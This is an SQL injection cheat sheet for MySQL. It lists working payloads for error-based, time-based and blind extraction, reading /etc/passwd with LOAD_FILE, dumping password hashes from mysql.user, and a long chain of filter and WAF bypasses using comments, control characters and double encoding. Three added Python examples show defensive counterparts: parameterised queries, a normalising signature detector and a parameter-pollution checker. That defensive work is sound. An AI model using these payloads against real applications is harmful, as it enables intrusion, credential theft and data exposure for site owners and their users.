Version:

SELECT @@version
version()

Comments:

SELECT 1; #COMMENT
SELECT /*COMMENT*/ 1;

Current User:

SELECT user();
SELECT system_user();

List User:

SELECT user FROM mysql.user; (need priv)

List Password Hashes:

SELECT host, user, password FROM mysql.user; (need priv)

Current Database:

SELECT database()

List Database:

SELECT schema_name FROM information_schema.schemata; (MySQL >= 5.0)
SELECT distinct(db) FROM mysql.db (need priv)

Quick Detection
Error Based SQLi:
For integer inputs:

(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

For string inputs:

'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Clear SQLi Tests:

?id=4
?id=5-1
?id=4 OR 1=1
?id=-1 OR 17-7=10
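The four probes above work because the application splices the raw `id` value into the SQL text, so `5-1` is evaluated as arithmetic and `4 OR 1=1` widens the WHERE clause. The following is an added example (not part of the original cheat sheet) showing the concatenation bug next to the fix a defender applies: a strict integer check followed by a bound parameter. It uses Python's bundled sqlite3 as an offline stand-in for MySQL (an assumption; the bug and the fix look the same on both), with a constructed three-row `users` table.

```python
import re
import sqlite3

# Constructed sample rows standing in for an application's users table.
# sqlite3 is used purely as an offline stand-in for MySQL (assumption).
SAMPLE_ROWS = [(4, "alice"), (5, "bob"), (6, "carol")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """String concatenation: the request value becomes part of the SQL text,
    so '5-1' is evaluated as arithmetic and '4 OR 1=1' widens the WHERE."""
    sql = "SELECT name FROM users WHERE id = " + raw_id
    return sorted(row[0] for row in conn.execute(sql))


# Only an unsigned decimal integer of sane length is accepted. str.isdigit()
# is deliberately not used because it also accepts non-ASCII digit characters.
_INT_RE = re.compile(r"[0-9]{1,10}")


def lookup_safe(conn, raw_id):
    """Strict type check, then a bound parameter. Returns None when the input
    is rejected so the caller can answer 400 instead of running a query."""
    if _INT_RE.fullmatch(raw_id) is None:
        return None
    sql = "SELECT name FROM users WHERE id = ?"
    return sorted(row[0] for row in conn.execute(sql, (int(raw_id),)))


def compare(raw_id):
    """Run one request value through both versions and return
    (vulnerable_result, safe_result)."""
    conn = make_db()
    try:
        vulnerable = lookup_vulnerable(conn, raw_id)
    except sqlite3.Error:
        vulnerable = "error"
    safe = lookup_safe(conn, raw_id)
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    for probe in ("4", "5-1", "4 OR 1=1", "-1 OR 17-7=10"):
        print(repr(probe), "->", compare(probe))
```

The vulnerable path returns the same single row for `4` and `5-1` and all three rows for the two `OR` probes, which is exactly the signal the "Clear SQLi Tests" rely on; the hardened path accepts only `4` and never lets the other three reach the database.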

Blind SQL Injection Time Based

SLEEP(5)-- 
SELECT BENCHMARK(1000000,MD5('A'));
id=1 OR SLEEP(25)=0 LIMIT 1-- 
id=1) OR SLEEP(25)=0 LIMIT 1-- 
id=1' OR SLEEP(25)=0 LIMIT 1-- 
id=1') OR SLEEP(25)=0 LIMIT 1-- 
id=1)) OR SLEEP(25)=0 LIMIT 1-- 
id=SELECT SLEEP(25)-- 

Line Comments

DROP sampletable;--
DROP sampletable;#
admin' or '1'='1'-- 

Inline Comments

DROP/**/sampletable;
DR/**/OP/**/sampletable;

If Statements

SELECT IF(1=1, 1, 2)
SELECT IF(user()='root@localhost','true','false')

String without Quotes

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

LoadFile

' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
0x633A5C626F6F742E696E69 is the hex form of c:\boot.ini, so this returns the contents of that file without a quoted string in the query.

List User

SELECT * FROM `user` WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user

List Password

SELECT user, password FROM mysql.user
SELECT user, password FROM mysql.user LIMIT 1,1
SELECT password FROM mysql.user WHERE user = 'root'

List Databases

SELECT schema_name FROM information_schema.schemata;
SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

Privileges

SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
SELECT Super_priv FROM mysql.user WHERE user='root' LIMIT 1,1--

Getting Column Names

SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tblUsers'
tblUsers is the table name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
finds every table that has a column called 'username'

Time Based SQLi Exploitation

?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTION}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--
{INJECTION} = the query whose result you want to read, one character at a time
ASCII <==> HEX (interchangeable)
MID <==> SUBSTRING <==> SUBSTR (interchangeable)

Something About Bypass

PHP filter code: preg_match('/(and|or)/i',$id);
Bypass: 1||1    1&&1

PHP filter code: preg_match('/(and|or|union)/i', $id);
Payload: union select user, password from users
Bypass:  1 || (select user from users where user_id = 1) = 'admin'

PHP filter code: preg_match('/(and|or|union|where)/i', $id)
Payload: 1 || (select user from users where user_id = 1) = 'admin'
Bypass:  1 || (select user from users limit 1) = 'admin'

PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
Payload: 1 || (select user from users limit 1) = 'admin'
Bypass:  1 || (select user from users group by user_id having user_id=1) = 'admin'

PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Payload: 1 || (select user from users group by user_id having user_id=1) = 'admin'
Bypass:  1 || (select substr(group_concat(user_id),1,1) user from users) = 1

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Payload: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypass:  1 || 1=1 into outfile 'result.txt'
Bypass:  1 || substr(user,1,1)='a'

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Payload: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypass:  1 || user_id is not null
Bypass:  1 || substr(user,1,1) = 0x61
Bypass:  1 || substr(user,1,1) = unhex(61)

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Payload: 1 || substr(user,1,1) = unhex(61)
Bypass:  1 || substr(user,1,1) = lower(conv(10,10,36))

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Payload: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypass:  1 || lpad(user,7,1)

PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Payload: 1 || lpad(user, 7, 1)
Bypass:  1%0b||%0blpad(user,7,1)

Bypass with comments
id=1+un/**/ion+se/**/lect+1,2,3-- 

Bypass Regex Filter: /union\sselect/g
1+UnIon/**/SeLecT/**/1,2,3-- 

Bypass preg_replace
1+UNunionION+SEselectLECT+1,2,3--

If the WAF uses preg_replace to replace SQL keywords with whitespace:
1+uni%0bon+se%0blect+1,2,3--

With mod_rewrite in front, /**/ does not get through, so %0b is used in place of /**/.

Double encoding can bypass some WAFs:
1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

e.g.
id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
%0D%0A is a newline (CRLF), which terminates each # comment; decoded, the server sees:
==>
0 div 1 union#foo*/*bar
select#foo
1,2,current_user

Inline Comments
id=1/*!uNIon*/SeLeCt+1,2,3-- 
id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
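Every entry in the "Something About Bypass" list and in the comment/encoding bypasses above defeats the same weakness: a preg_match-style blacklist applied to the raw request bytes, while MySQL reads the value only after URL decoding, comment handling and whitespace folding. The added example below (not from the original page) is the defender's counterpart: it canonicalises a value the way MySQL will effectively read it, then matches signatures on that canonical form, and reports side by side what a naive raw-string filter would have caught. Because the page claims that `DR/**/OP` and `uni%0bon` form one keyword on some builds while `/**/` normally separates tokens, the normaliser is run under both readings and the hits are merged. The sample values are constructed from this page's own payloads (the double-encoded one is the page's payload with its stray space removed) plus three benign controls; rule names and the `NAIVE_FILTER` pattern are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample parameter values as they would appear in a query string.
# The shaped ones reproduce payloads listed on this page; the last three are
# benign controls.
SAMPLE_VALUES = [
    "1+un/**/ion+se/**/lect+1,2,3--+",
    "1+uni%0bon+se%0blect+1,2,3--",
    "1%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3",
    "0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user",
    "1/*!uNIon*/SeLeCt+1,2,3--+",
    "1%0b||%0blpad(user,7,1)",
    "1+OR+SLEEP(25)=0+LIMIT+1--+",
    "'+UNION+ALL+SELECT+LOAD_FILE('/etc/passwd')+--",
    "4",
    "order+by+date",
    "hello+world",
]

# Signatures are evaluated on the canonical form, never on the raw bytes.
RULES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    # weak on its own ("cats and dogs"); meaningful combined with the others
    "boolean_logic": re.compile(r"\b(or|and)\b|\|\||&&"),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b"),
    "schema_enum": re.compile(r"\binformation_schema\b|\bmysql\.user\b"),
}

# The kind of raw-string preg_match check that this page's bypass list defeats.
NAIVE_FILTER = re.compile(r"union\s+select|sleep", re.I)


def normalize(value, joiner):
    """Canonicalise a request value the way MySQL will effectively read it.

    `joiner` is what an ordinary comment or a control character becomes:
    " " (they separate tokens) or "" (they vanish, the reading under which
    DR/**/OP and uni%0bon would form one keyword). Callers try both.
    """
    s = value
    for _ in range(3):                       # undo single and double encoding
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"(--|#)[^\r\n]*", " ", s)    # line comments run to end of line
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)   # /*!...*/ is executed
    s = re.sub(r"/\*.*?\*/", joiner, s, flags=re.S)          # /*...*/ is not
    s = re.sub(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]", joiner, s)  # %0b, NUL, ...
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(value):
    """Sorted names of the rules that fire on either canonical reading."""
    hits = set()
    for joiner in (" ", ""):
        canon = normalize(value, joiner)
        hits.update(name for name, rx in RULES.items() if rx.search(canon))
    return sorted(hits)


def naive_blocks(value):
    """What a blacklist applied to the raw request value would decide."""
    return NAIVE_FILTER.search(value) is not None


def scan(values=SAMPLE_VALUES):
    """(value, caught by the naive filter?, rules hit after normalisation)."""
    return [(v, naive_blocks(v), classify(v)) for v in values]


if __name__ == "__main__":
    for value, naive, hits in scan():
        flag = "naive:BLOCK" if naive else "naive:pass "
        print(f"{flag}  {hits or '-'}  {value}")
```

Run stand-alone, the table shows the naive filter catching only the plain `OR SLEEP(25)` probe while every obfuscated variant reaches the normalised rules. The design point is that decoding and comment handling must happen once, in the filter, in the same order the database applies them; a blacklist that only grows longer, as the preg_match series above illustrates, never closes the gap.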

HPP (HTTP Parameter Pollution: Split and Join)

+------------------+------------------------------+-----------------+
| Web Server       | Parameter Interpretation     | Example         |
+------------------+------------------------------+-----------------+
| ASP.NET/IIS      | Concatenation by comma       | par1=val1,val2  |
| ASP/IIS          | Concatenation by comma       | par1=val1,val2  |
| PHP/Apache       | The last value is used       | par1=val2       |
| JSP/Tomcat       | The first value is used      | par1=val1       |
| Perl/Apache      | The first value is used      | par1=val1       |
| DBMan            | Concatenation by two tildes  | par1=val1~~val2 |
+------------------+------------------------------+-----------------+

HPC (HTTP Parameter Contamination)

Web server response / GET values for each query string:

+------------------+--------------------------+------------+
| Query String     | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP   |
+------------------+--------------------------+------------+
| ?test[1=2        | test_1=2                 | test[1=2   |
| ?test=%          | test=%                   | test=      |
| ?test%00=1       | test=1                   | test=1     |
| ?test=1%001      | NULL                     | test=1     |
| ?test+d=1+2      | test_d=1 2               | test d=1 2 |
+------------------+--------------------------+------------+
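Both tables make the same point: the meaning of a query string depends on which server parses it, so a filter that sits in front of several backends must reject the ambiguous cases rather than guess. The added example below (not part of the original page) parses a query string with Python's standard `parse_qsl`, keeps every value of a repeated parameter, shows the readings the HPP table lists for the different server families, and flags the names and values the HPC table shows being rewritten (bracket, space, NUL). The sample query strings are constructed from the two tables; the identifier character set and the `server_views` labels are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl

# Names outside this conservative set are the ones the HPC table shows being
# rewritten server-side (PHP turns '[' and space into '_'; NUL truncates), so
# their meaning depends on the backend.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def server_views(values):
    """Readings of one repeated parameter per the HPP table's server families."""
    return {
        "first": values[0],                 # JSP/Tomcat, Perl/Apache
        "last": values[-1],                 # PHP/Apache
        "comma_joined": ",".join(values),   # ASP.NET/IIS, ASP/IIS
        "tilde_joined": "~~".join(values),  # DBMan
    }


def analyse_query(query_string):
    """Report the ambiguities a front-end filter should reject before any
    backend-specific parsing gets a chance to resolve them differently."""
    qs = query_string[1:] if query_string.startswith("?") else query_string
    seen = {}
    for name, value in parse_qsl(qs, keep_blank_values=True):
        seen.setdefault(name, []).append(value)
    duplicates = {n: server_views(v) for n, v in seen.items() if len(v) > 1}
    odd_names = sorted(n for n in seen if SAFE_NAME.fullmatch(n) is None)
    control_in_values = sorted(
        n for n, v in seen.items() if any(CONTROL.search(x) for x in v)
    )
    return {
        "duplicates": duplicates,
        "odd_names": odd_names,
        "control_in_values": control_in_values,
    }


def is_ambiguous(query_string):
    """True when any backend in the tables would read the request differently."""
    return any(analyse_query(query_string).values())


if __name__ == "__main__":
    # Constructed samples drawn from the two tables above.
    for qs in ("?par1=val1&par1=val2", "?test[1=2", "?test%00=1",
               "?test=1%001", "?test+d=1+2", "?id=4&page=2"):
        print(qs, "->", analyse_query(qs))
```

The filter never tries to pick the "right" value of a duplicated parameter; it surfaces all four readings so an analyst can see what each backend would have executed, and `is_ambiguous` gives the front end a single decision to reject on.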

SUBSTRING/MID
extract a substring

CONCAT
string concatenation

hex()/unhex()